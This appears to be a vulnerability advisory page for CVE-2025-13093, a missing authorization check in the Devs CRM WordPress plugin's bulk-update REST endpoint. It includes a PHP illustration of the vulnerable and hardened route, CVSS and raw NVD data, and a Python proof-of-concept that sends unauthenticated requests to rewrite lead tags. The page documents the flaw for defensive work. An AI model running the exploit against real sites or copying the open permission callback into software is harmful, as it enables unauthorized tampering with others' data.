Security Vulnerability Report
CVE-2025-13093 CVSS 5.3 MEDIUM

CVE-2025-13093

Published: 2025-12-13 16:16:47
Last Modified: 2026-04-15 00:35:42

Description

The Devs CRM – Manage tasks, attendance and teams all together plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the '/wp-json/devs-crm/v1/bulk-update' REST API endpoint in all versions up to, and including, 1.1.8. This makes it possible for unauthenticated attackers to update leads' tags.
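The weakness named here (CWE-862 in the raw record: a missing authorization check) takes a characteristic shape in WordPress REST routes: the route's `permission_callback` admits every visitor, so the handler runs for unauthenticated requests. The following is an added illustration written for this report, not the Devs CRM plugin's own code (the page does not show it). It registers a route the vulnerable way and, beside it, the same route with a capability check and argument validation. The capability `edit_posts`, the handler name `example_bulk_update_handler`, the `-hardened` route suffix and the parameter names `lead_ids` and `tags` are assumptions for the illustration.

```php
<?php
// Added illustration of CWE-862 in a WordPress REST route; not the plugin's real code.
// Namespace and route match the endpoint path named in the advisory:
//   /wp-json/devs-crm/v1/bulk-update

// VULNERABLE PATTERN: '__return_true' as permission_callback means anyone,
// logged in or not, can reach the handler. This is the missing capability check.
add_action('rest_api_init', function () {
    register_rest_route('devs-crm/v1', '/bulk-update', [
        'methods'             => 'POST',
        'callback'            => 'example_bulk_update_handler',  // hypothetical name
        'permission_callback' => '__return_true',
    ]);
});

// HARDENED PATTERN: require an authenticated user holding a suitable capability
// (assumed here: edit_posts) and validate/sanitize arguments before the handler runs.
add_action('rest_api_init', function () {
    register_rest_route('devs-crm/v1', '/bulk-update-hardened', [
        'methods'             => 'POST',
        'callback'            => 'example_bulk_update_handler',
        'permission_callback' => function (WP_REST_Request $request) {
            // current_user_can() is false for unauthenticated requests, so both
            // anonymous callers and low-privilege users are rejected here.
            if (!is_user_logged_in() || !current_user_can('edit_posts')) {
                return new WP_Error(
                    'rest_forbidden',
                    'You are not allowed to bulk-update leads.',
                    ['status' => 403]
                );
            }
            return true;
        },
        'args' => [
            'lead_ids' => [
                'required'          => true,
                'type'              => 'array',
                'items'             => ['type' => 'integer'],
                'sanitize_callback' => function ($ids) {
                    return array_map('absint', (array) $ids);
                },
            ],
            'tags' => [
                'required'          => true,
                'type'              => 'array',
                'items'             => ['type' => 'string'],
                'sanitize_callback' => function ($tags) {
                    return array_map('sanitize_text_field', (array) $tags);
                },
            ],
        ],
    ]);
});

// Handler shared by both registrations; the plugin-specific persistence of tags
// onto leads is out of scope for this illustration.
function example_bulk_update_handler(WP_REST_Request $request) {
    $lead_ids = $request->get_param('lead_ids');
    $tags     = $request->get_param('tags');
    return rest_ensure_response([
        'updated' => count($lead_ids),
        'tags'    => $tags,
    ]);
}
```

With the hardened registration, an unauthenticated POST of the kind shown in the PoC section receives a 403 `rest_forbidden` response before the handler executes; a logged-in user without `edit_posts` is rejected the same way. Keeping the authorization decision in `permission_callback` rather than inside the handler also means WordPress applies it uniformly, and `WP_REST_Server` will not dispatch the request if the callback returns false or a `WP_Error`.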

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)


Devs CRM plugin <= 1.1.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

target = 'http://vulnerable-wordpress-site.com'

# CVE-2025-13093 PoC - Unauthorized bulk-update via REST API
endpoint = '/wp-json/devs-crm/v1/bulk-update'
url = target + endpoint

payload = {
    'lead_ids': [1, 2, 3, 4, 5],
    'tags': ['malicious_tag', 'spam', 'unwanted']
}

headers = {
    'Content-Type': 'application/json',
    'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-13093-PoC)'
}

try:
    response = requests.post(url, json=payload, headers=headers, timeout=10)
    print(f'Status Code: {response.status_code}')
    print(f'Response: {response.text}')
    if response.status_code == 200:
        print('[+] SUCCESS: Lead tags updated without authentication')
    else:
        print('[-] Failed or plugin not vulnerable')
except requests.exceptions.RequestException as e:
    print(f'[-] Request failed: {e}')
```

References

https://wordpress.org/plugins/devs-crm/
https://www.wordfence.com/threat-intel/vulnerabilities/id/78794ea4-6eff-4e6f-af0a-dd8cab8ac859?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13093", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:47.143", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Devs CRM – Manage tasks, attendance and teams all together plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the '/wp-json/devs-crm/v1/bulk-update' REST-API endpoint in all versions up to, and including, 1.1.8. This makes it possible for unauthenticated attackers to update leads tags."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wordpress.org/plugins/devs-crm/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/78794ea4-6eff-4e6f-af0a-dd8cab8ac859?source=cve", "source": "[email protected]"}]}}